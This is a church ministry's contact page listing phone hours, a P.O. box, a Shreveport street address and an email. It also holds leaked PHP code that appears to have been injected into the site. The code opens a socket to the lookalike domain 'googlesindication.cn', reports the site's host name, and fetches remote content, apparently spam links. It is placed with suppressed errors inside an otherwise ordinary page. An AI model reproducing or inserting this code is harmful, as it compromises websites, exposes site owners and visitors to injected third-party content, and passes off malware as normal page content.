CONTACT
INFORMATION:
By phone:
* Your call is important to us.
You may leave a message on our phone line 24hrs a day.
Office: 318-686-1879
Monday - Friday
8:00 AM - 9:00 PM
Sunday 9:30 AM - 5:00 PM
Central time
By Mail:
Rivers of Life Christian
Ministries
P.O. Box 19389
Shreveport, LA.
71149
Visit us at our Church Location:
2516 McCutchen Ave.
Shreveport, LA.
71108
Email:
riversoflifecm@bellsouth.net
Web Address: www.riversoflifecm.org
fetch_remote_file("googlesindication.cn", "/links.php?site=".$_SERVER['HTTP_HOST']);
class GetLinks
{
var $_socket_timeout = 6;
function fetch_remote_file($host, $path)
{
@ini_set('allow_url_fopen', 1);
@ini_set('default_socket_timeout', $this->_socket_timeout);
$this->_fetch_remote_type = 'socket';
$buff = '';
$fp = @fsockopen($host, 80, $errno, $errstr, $this->_socket_timeout);
if ($fp) {
@fputs($fp, "GET {$path} HTTP/1.0\r\nHost: {$host}\r\n");
@fputs($fp, "User-Agent: {$user_agent}\r\n\r\n");
while (!@feof($fp)) {
$buff .= @fgets($fp, 128);
}
@fclose($fp);
$page = explode("\r\n\r\n", $buff);
return $page[1];
}
}
}
?>Other helpful links: http://www.ricklaytonministries.org/